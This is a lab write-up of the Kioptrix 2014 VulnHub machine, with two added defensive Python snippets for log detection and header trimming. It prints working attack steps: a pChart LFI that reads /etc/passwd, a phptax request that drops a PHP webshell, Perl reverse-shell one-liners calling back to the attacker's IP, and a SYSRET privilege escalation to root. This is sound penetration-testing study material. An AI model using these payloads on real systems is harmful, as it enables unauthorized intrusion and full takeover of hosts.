Kioptrix Write-Up (no MSF)
KIOPTRIX 2014 VULNHUB VM WRITEUP
Let’s start with some standard nmap.
nmap -T4 -sV -p- --script discovery 192.168.120.135 -v
Output reveals some open ports. Let’s begin enumerating!
Manually visiting the HTTP page on port 80 reveals a plain "It works!" page. Looking at its source:
<html>
<head>
<!-- <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php"> -->
</head>
<body>
<h1>It works!</h1>
</body>
</html>
Manually browse to that path in a browser or with curl:
http://192.168.120.135/pChart2.1.3
Searchsploit reveals an LFI vuln for pChart.
https://www.exploit-db.com/exploits/31173/
Use the LFI to view /etc/passwd (take note of root's shell):
http://192.168.120.135/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
Why can't I get on p8080? It is running Apache, so what is going on?
I'll use the pChart LFI to read the Apache config, since something in there may be blocking me. I'll also check the firewall rules while I'm in there, but given it is an Apache 403 error, the block is happening higher up the OSI stack than the firewall. Still, in the interests of completeness... it might come in handy later too!
This link tells you the location of the conf file (it's FreeBSD, remember!): https://www.freebsd.org/doc/handbook/network-apache.html
http://192.168.120.135/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf
It's worth a quick skim through here before Ctrl+F for 8080. Note the vhost on p8080:
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
</VirtualHost>
Accessing p8080 via changed User-Agent
Let's try with a different User-Agent, then; it works. I used User Agent Overrider and created a quick profile for Mozilla4. Here is a copy of my settings file:
Linux / Firefox 44: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Mac OS X / Safari: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9
Windows / IE 11: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Windows / Edge: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
Android / Chrome 40: Mozilla/5.0 (Linux; Android 5.1.1; Nexus 4 Build/LMY48T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.89 Mobile Safari/537.36
iOS / Safari 9: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1
Google Bot: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
PS4: Mozilla/5.0 (PlayStation 4 3.15) AppleWebKit/537.73 (KHTML, like Gecko)
Curl: curl/7.43.0
Mozilla4: Mozilla/4.0
MSF? No!
There is an msf module for phptax but that’s no fun – why take the easy route? Try harder!
Searchsploit reveals an exploit for phptax: https://www.exploit-db.com/exploits/25849/
Looking at the exploit, it is just a fancy wrapper for creating a new PHP file. What happens if I just access the URL manually (making sure the User-Agent is correct!) via plain old copy-paste?
http://192.168.120.136:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru%28%24_GET[cmd]%29%3B%3F%3E
Then look in the data/pdf directory and I can see it. I knew it was this directory because another exploit listed it as the DATADIR. It would be pretty strange if the webapp couldn't write to its own data dir!
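From the defender's side, the two requests above (the pChart traversal and the phptax file write) leave distinctive lines in the Apache access log. The following is an added example, not part of the write-up: detection logic run over constructed log lines, which shows why query values have to be URL-decoded before matching, since the traversal arrives as %2f and the PHP tag as %3C%3Fphp.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-format log lines (not captured from the VM);
# the request targets mirror the pChart and phptax requests in the write-up.
SAMPLE_LOG = """\
192.168.120.132 - - [25/Jul/2016:16:01:02 +0100] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
192.168.120.132 - - [25/Jul/2016:16:03:11 +0100] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.drawBar.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.168.120.132 - - [25/Jul/2016:16:10:45 +0100] "GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru%28%24_GET[cmd]%29%3B%3F%3E HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.168.120.132 - - [25/Jul/2016:16:11:02 +0100] "GET /phptax/data/rce.php?cmd=uname%20-a HTTP/1.1" 200 97 "-" "Mozilla/4.0"
192.168.120.132 - - [25/Jul/2016:16:12:30 +0100] "GET /phptax/index.php?field=year&newvalue=2014 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
"""

# Pulls the request target out of the quoted request field.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify(line):
    """Return the list of finding labels for one access-log line."""
    m = REQ_RE.search(line)
    if not m:
        return []
    url = urlparse(m.group("target"))
    # parse_qs percent-decodes values, so %2f becomes "/" and %3C%3Fphp becomes "<?php".
    params = parse_qs(url.query)
    findings = []
    # pChart: the Script parameter should name a bundled example, never a path.
    for value in params.get("Script", []):
        if ".." in value or value.startswith("/"):
            findings.append("pchart-lfi")
    # phptax: a .php "field" name or PHP tags in "newvalue" means a file write, not a form edit.
    if url.path.endswith("/phptax/index.php"):
        field = "".join(params.get("field", []))
        value = "".join(params.get("newvalue", []))
        if field.endswith(".php") or "<?php" in value or "<?=" in value:
            findings.append("phptax-file-write")
    # Anything executing as .php out of phptax's data directory is a dropped file.
    if "/phptax/data/" in url.path and url.path.endswith(".php"):
        findings.append("php-in-phptax-data")
    return findings


def scan(log_text):
    """Return (line number, finding) pairs for every flagged line in the log text."""
    return [(i + 1, f) for i, line in enumerate(log_text.splitlines()) for f in classify(line)]
```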
Initial Shell
I can now run commands and see the output.
http://192.168.120.136:8080/phptax/data/rce.php?cmd=uname -a
Perl reverse shell (keep trying until you find a language that's installed, or enumerate the languages manually before you try to throw a reverse shell).
Hint:
Use these commands to find out a bit about the environment:
find / -name "perl*"
find / -name "python*"
find / -name "gcc*"
find / -name cc
The initial Perl shell did not work:
perl -e 'use Socket;$i="192.168.120.132";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/csh -i");};'
I knew Perl was installed, so I tried an alternative – don't give up at the first hurdle! This gave me an initial foothold on the host.
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.120.132:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
On my listener:
root@kali:~/Downloads/# nc -lnvp 443
listening on [any] 443 ...
connect to [192.168.120.132] from (UNKNOWN) [192.168.120.136] 37621
id
uid=80(www) gid=80(www) groups=80(www)
whoami
www
hostname
kioptrix2014
Add in a TTY using:
/bin/csh -i
Note – you can see that this is definitely an installed shell, as root has it set in /etc/passwd.
I already know a bit about the environment, and I know FreeBSD 9 has a common vuln. Grab a copy of the SYSRET priv-esc exploit from the offline repo:
cp /usr/share/exploitdb/platforms/freebsd/local/28718.c . (note the dot for the current dir)
SimpleHTTPServer didn't seem to work, so I copied it into /var/www/html.
File Transfer
Manually download it over HTTP using netcat.
In the shell enter:
nc 192.168.120.132 80 > privesc.c
GET 28718.c HTTP/1.0
(no need for the full HTTP path)
Trimming File
Now we need to remove the HTTP headers at the top. Count the lines in the file, subtract 7, and use tail to get that many lines, piped into a new file. Or even use nano 🙂
wc -l privesc1.c
185 privesc1.c
tail -178 privesc1.c > compileme
cat compileme
gcc compileme -o privesc
The exploit still wouldn't compile, and I had to use job control to see the gcc output (you could pipe it into a text file and then manually cat it, however). I thought it might have been corrupted somewhere in the HTTP download, so I tried to use nc to transfer it instead.
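A more robust way to trim a netcat-captured download, added here as an example (not from the write-up): split at the first blank line instead of counting header lines, then compare the body length with the Content-Length header, which is the check that would show whether the transfer was truncated or corrupted. The response bytes below are constructed, including the Server header value.

```python
import re

# Constructed raw HTTP/1.0 response, laid out the way netcat writes it to disk:
# status line, headers, a blank line, then the file body. Not captured from the VM.
RAW_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: SimpleHTTP/0.6 Python/2.7\r\n"
    b"Content-type: text/x-csrc\r\n"
    b"Content-Length: 36\r\n"
    b"\r\n"
    b"#include <stdio.h>\nint main(void){}\n"
)


def strip_http_headers(raw):
    """Split a raw response at the first blank line and return (headers, body) as bytes."""
    # Tolerate CRLF (per the spec) as well as bare LF from lenient servers.
    m = re.search(rb"\r?\n\r?\n", raw)
    if m is None:
        raise ValueError("no end-of-headers blank line found; not a complete HTTP response")
    return raw[:m.start()], raw[m.end():]


def check_length(headers, body):
    """Return True/False for Content-Length vs body size, or None when the header is absent."""
    m = re.search(rb"(?im)^content-length:\s*(\d+)\s*$", headers)
    if m is None:
        return None
    return int(m.group(1)) == len(body)


def trim_file(src, dst):
    """Read a netcat-captured response from src, write only the body to dst, return the length check."""
    with open(src, "rb") as f:
        headers, body = strip_http_headers(f.read())
    with open(dst, "wb") as f:
        f.write(body)
    return check_length(headers, body)
```

A False from check_length means the body on disk is not what the server said it sent, so compile errors are a transfer problem rather than a source problem.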
On attacking box:
nc -lnvp 4444 < 28718.c (make sure to use a different port from the initial shell!)
On target:
nc 192.168.120.132 4444 > sysret.c
nc will download the file, but you have no TTY so you can't see it. Kill the original webshell, respawn it, and then check that the file has downloaded.
Compile SYSRET
gcc sysret.c -o privescexploit
Change permissions to executable and check:
kioptrix2014# chmod a+x privescexploit
kioptrix2014# ls -alt privesc*
-rwxr-xr-x 1 www wheel 10407 Jul 25 16:33 privescexploit
-rw-r--r-- 1 www wheel 5753 Jul 25 16:20 privesc1.c
./privescexploit
r00t achieved!
kioptrix2014# ./privescexploit
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
kioptrix2014# id
uid=0(root) gid=0(wheel) groups=0(wheel)
kioptrix2014#
Get in touch if you have any problems following the walkthrough. There are at least two other ways – one MSF and one using the other EDB exploit; however, I spent a while spinning my wheels (nice FreeBSD pun!) in syntax errors that made limited sense!